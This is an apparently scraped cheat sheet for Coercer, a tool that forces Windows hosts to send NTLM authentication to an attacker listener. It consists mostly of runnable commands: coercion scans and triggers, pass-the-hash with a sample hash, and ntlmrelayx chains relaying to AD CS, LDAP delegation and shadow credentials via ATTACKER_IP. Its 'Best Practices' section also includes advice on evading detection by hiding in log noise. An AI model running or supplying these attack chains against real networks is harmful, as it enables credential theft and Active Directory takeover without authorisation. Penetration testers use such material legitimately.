Coercer
Coercer is a Python tool that automates Windows authentication coercion attacks by triggering NTLM authentication from target machines to an attacker-controlled listener. It supports multiple coercion methods including PetitPotam, PrinterBug, DFSCoerce, and ShadowCoerce, enabling NTLM relay attacks for AD privilege escalation.
Installation
Sezione intitolata “Installation”Via pip
Sezione intitolata “Via pip”pip install coercerFrom GitHub
Sezione intitolata “From GitHub”git clone https://github.com/p0dalirius/Coercer.git
cd Coercer
pip install -r requirements.txt
python3 -m coercer --helpRequirements
Sezione intitolata “Requirements”- Python 3.8+
- impacket
- pycryptodomex
- requests
- argparse
Quick Start
Sezione intitolata “Quick Start”Basic coercion with credentials:
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAINScan target to identify working methods:
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAINCoerce with NTLM hash:
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c -d DOMAINCoercion Methods
Sezione intitolata “Coercion Methods”Coercer supports numerous coercion methods across different MS-RPC protocols and Windows services:
| Method | Service | Protocol | MS-RPC Interface | Impact |
|---|---|---|---|---|
| PetitPotam | EfsRpc | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| PrinterBug | Spooler | \\pipe\spoolss | Printer (RPC) | High - SYSTEM auth |
| DFSCoerce | MSDFS | \\pipe\netdfs | NetDFS | Medium - SYSTEM auth |
| ShadowCoerce | Shadow Copy VSS | \\pipe\vssadmin | FSRVP | Medium - SYSTEM auth |
| MSEFSRCoerce | EFSRPC | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| Webexec | WebClient | HTTP | IOCTL | Medium - User context |
| DFSCoerceRPC | MSDFS | \\pipe\netdfs | NetDFS | Medium - SYSTEM auth |
| RprRemoteFindFirstFile | RemoteRegistry | \\pipe\winreg | RemoteRegistry | Low - Registry read |
| EfsRpcOpenFileRaw | EfsRpc | \\pipe\efsrpc | EfsRpc | High - SYSTEM auth |
| Lsasrv | LSA | \\pipe\lsarpc | LSA | Medium - LSASS auth |
| Tssession | Terminal Services | \\pipe\tssession | TermSrv | Low - TS context |
Scan Mode
Sezione intitolata “Scan Mode”Enumerate which coercion methods work without triggering full authentication:
# Scan all methods
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
# Scan with NTLM hash
coercer scan -t 192.168.1.50 -u domain\\user -H HASH -d DOMAIN
# Filter by method name
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-method PetitPotam
# Filter by protocol
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-protocol EfsRpc
# Filter by pipe name
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --filter-pipe-name efsrpc
# Scan with timeout per method
coercer scan -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --timeout 10Coerce Mode
Sezione intitolata “Coerce Mode”Trigger actual NTLM authentication to listener:
# Basic coercion to listener
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
# Coerce specific method
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --method PetitPotam
# Coerce with output verbosity
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -v
# Coerce to alternative port
coercer coerce -l 192.168.1.100:4444 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
# Coerce with timeout
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN --timeout 30Fuzz Mode
Sezione intitolata “Fuzz Mode”Discover new coercion methods by fuzzing RPC endpoints:
# Fuzz target to discover methods
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100
# Fuzz with specific pipe
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100 --pipe efsrpc
# Fuzz with timeout
coercer fuzz -t 192.168.1.50 -u domain\\user -p password -d DOMAIN -l 192.168.1.100 --timeout 30Authentication Options
Sezione intitolata “Authentication Options”Username/Password Authentication
Sezione intitolata “Username/Password Authentication”coercer coerce -l LISTENER -t TARGET -u domain\\username -p password -d DOMAIN
coercer coerce -l LISTENER -t TARGET -u username -p password -d DOMAINNTLM Hash Authentication (Pass-the-Hash)
Sezione intitolata “NTLM Hash Authentication (Pass-the-Hash)”coercer coerce -l LISTENER -t TARGET -u domain\\username -H LM:NTLM -d DOMAIN
coercer coerce -l LISTENER -t TARGET -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586cKerberos Authentication
Sezione intitolata “Kerberos Authentication”coercer coerce -l LISTENER -t TARGET -k -d DOMAIN
export KRB5CCNAME=/tmp/user.ccache
coercer coerce -l LISTENER -t TARGET -kNo Authentication
Sezione intitolata “No Authentication”coercer coerce -l LISTENER -t TARGET --no-pass
coercer scan -t TARGET --no-passLocal Authentication
Sezione intitolata “Local Authentication”coercer coerce -l LISTENER -t TARGET --localListener Setup
Sezione intitolata “Listener Setup”Using ntlmrelayx (SMB Relay)
Sezione intitolata “Using ntlmrelayx (SMB Relay)”# Terminal 1: Start ntlmrelayx
ntlmrelayx.py -t 192.168.1.60 --no-http-server -smb2support
# Terminal 2: Run coercer
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAINUsing Responder (LLMNR/NBT-NS)
Sezione intitolata “Using Responder (LLMNR/NBT-NS)”# Terminal 1: Start Responder
responder -I eth0 -v
# Terminal 2: Run coercer with SMB relay
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAINCustom SMB Server Listener
Sezione intitolata “Custom SMB Server Listener”# Using impacket smbserver
smbserver.py -smb2support -ip 192.168.1.100 share /tmp
# Run coercer to relay
coercer coerce -l 192.168.1.100 -t 192.168.1.50 -u domain\\user -p password -d DOMAINListening on Specific Port
Sezione intitolata “Listening on Specific Port”coercer coerce -l 192.168.1.100:445 -t TARGET -u domain\\user -p password -d DOMAINCommon Attack Chains
Sezione intitolata “Common Attack Chains”Coerce to ntlmrelayx → AD CS ESC8
Sezione intitolata “Coerce to ntlmrelayx → AD CS ESC8”# Terminal 1: Start ntlmrelayx targeting ADCS
ntlmrelayx.py -t http://dc.domain.local/certsrv/certfnsh.asp -template DomainController --no-http-server -smb2support
# Terminal 2: Coerce to relay
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAINCoerce to ntlmrelayx → LDAP for RBCD
Sezione intitolata “Coerce to ntlmrelayx → LDAP for RBCD”# Terminal 1: Start ntlmrelayx for LDAP relay with RBCD
ntlmrelayx.py -t ldap://dc.domain.local --no-http-server -smb2support --delegate-access
# Terminal 2: Coerce target
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAINCoerce to Relay for Shadow Credentials
Sezione intitolata “Coerce to Relay for Shadow Credentials”# Terminal 1: Start ntlmrelayx targeting LDAP
ntlmrelayx.py -t ldap://dc.domain.local --no-http-server -smb2support --shadow-credentials
# Terminal 2: Trigger coercion
coercer coerce -l ATTACKER_IP -t TARGET -u domain\\user -p password -d DOMAINCoerce Machine Account to Relay for Privilege Escalation
Sezione intitolata “Coerce Machine Account to Relay for Privilege Escalation”# Scan first to find working method
coercer scan -t DC_IP -u domain\\user -p password -d DOMAIN
# Coerce DC to listener for relay to ADCS
coercer coerce -l ATTACKER_IP -t DC_IP -u domain\\user -p password -d DOMAIN --method PetitPotamWebDAV Coercion
Sezione intitolata “WebDAV Coercion”Force HTTP authentication instead of SMB for cross-protocol relay attacks:
# Enable WebDAV coercion (requires WebClient service running)
coercer coerce -l http://ATTACKER_IP:80 -t 192.168.1.50 -u domain\\user -p password -d DOMAIN
# WebDAV with custom path
coercer coerce -l http://ATTACKER_IP:8080/share -t TARGET -u domain\\user -p password -d DOMAIN
# Combine with HTTP listener on ntlmrelayx
ntlmrelayx.py -I http://ATTACKER_IP:8080 -t http://target.com --no-smb-server
coercer coerce -l http://ATTACKER_IP:8080 -t TARGET -u domain\\user -p password -d DOMAINFiltering Options
Sezione intitolata “Filtering Options”Filter by Method Name
Sezione intitolata “Filter by Method Name”# Only PetitPotam
coercer scan -t TARGET -u domain\\user -p password --filter-method PetitPotam
# Multiple methods
coercer scan -t TARGET -u domain\\user -p password --filter-method "PetitPotam|PrinterBug"Filter by Protocol Name
Sezione intitolata “Filter by Protocol Name”# Only EfsRpc protocol
coercer scan -t TARGET -u domain\\user -p password --filter-protocol EfsRpc
# Multiple protocols
coercer scan -t TARGET -u domain\\user -p password --filter-protocol "EfsRpc|NetDFS"Filter by Pipe Name
Sezione intitolata “Filter by Pipe Name”# Only efsrpc pipe
coercer scan -t TARGET -u domain\\user -p password --filter-pipe-name efsrpc
# Multiple pipes
coercer scan -t TARGET -u domain\\user -p password --filter-pipe-name "efsrpc|netdfs"Combine Filters
Sezione intitolata “Combine Filters”coercer scan -t TARGET -u domain\\user -p password -d DOMAIN \
--filter-method PetitPotam \
--filter-protocol EfsRpcTroubleshooting
Sezione intitolata “Troubleshooting”Target Unreachable
Sezione intitolata “Target Unreachable”# Verify connectivity
ping TARGET_IP
# Test SMB connectivity
smbclient -L //TARGET_IP -u domain\\user -p password
# Test with timeout
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN --timeout 30Authentication Failed
Sezione intitolata “Authentication Failed”# Verify credentials
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v
# Try alternative username format
coercer scan -t TARGET -u DOMAIN\\user -p password -d DOMAIN
# Use NTLM hash instead
coercer scan -t TARGET -u domain\\user -H HASH -d DOMAINService Not Available
Sezione intitolata “Service Not Available”# Some methods require specific services running
# Check if MSDFS, Spooler, or EfsRpc services are active
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v
# Try with timeout increase
coercer coerce -l LISTENER -t TARGET -u domain\\user -p password -d DOMAIN --timeout 60No Working Methods Found
Sezione intitolata “No Working Methods Found”# Method may be patched or disabled
# Try scanning with verbose output
coercer scan -t TARGET -u domain\\user -p password -d DOMAIN -v
# Enumerate installed hotfixes
wmic qfe list brief /format:listListener Connection Issues
Sezione intitolata “Listener Connection Issues”# Verify listener is running and accessible
telnet LISTENER_IP 445
# Check firewall rules
sudo ufw allow 445/tcp
# Use verbose logging
coercer coerce -l LISTENER_IP -t TARGET -u domain\\user -p password -d DOMAIN -vBest Practices
Sezione intitolata “Best Practices”- Always Scan First: Use
coercescan to identify working methods before triggering full coercion - Use Specific Methods: Target known-working methods to avoid noise and detection
- Filter Results: Leverage filtering to reduce network activity and operational footprint
- Combine with Relay: Pair Coercer with ntlmrelayx or Responder for effective privilege escalation
- Monitor Logs: Coercion attempts generate security event logs; operate during high activity periods
- Patch Management: Target systems with outdated patches are more likely to support multiple methods
- Service Enumeration: Verify target services (Spooler, EfsRpc, MSDFS) are running before coercion
- Credential Handling: Use NTLM hashes or Kerberos tickets to avoid passing plaintext credentials
- Clean Relay Chains: Ensure ntlmrelayx or relay tool is properly configured before coercing
- Documentation: Log all coercion attempts, timing, and results for post-exploitation analysis
Related Tools
Sezione intitolata “Related Tools”| Tool | Purpose |
|---|---|
| PetitPotam | Standalone EfsRpc coercion tool; foundation for Coercer |
| ntlmrelayx | NTLM relay framework to authenticate against other services |
| Responder | LLMNR/NBT-NS poisoning and relay tool |
| Certipy | Active Directory Certificate Services enumeration and exploitation |
| krbrelayx | Kerberos relay attacks and alternative authentication methods |
| SpoolSample | Standalone PrinterBug implementation |
| PrintNightmare | RCE exploit for CVE-2021-1675 via Print Spooler |
| Shadow Credentials | Credential dumping via shadow credentials in Active Directory |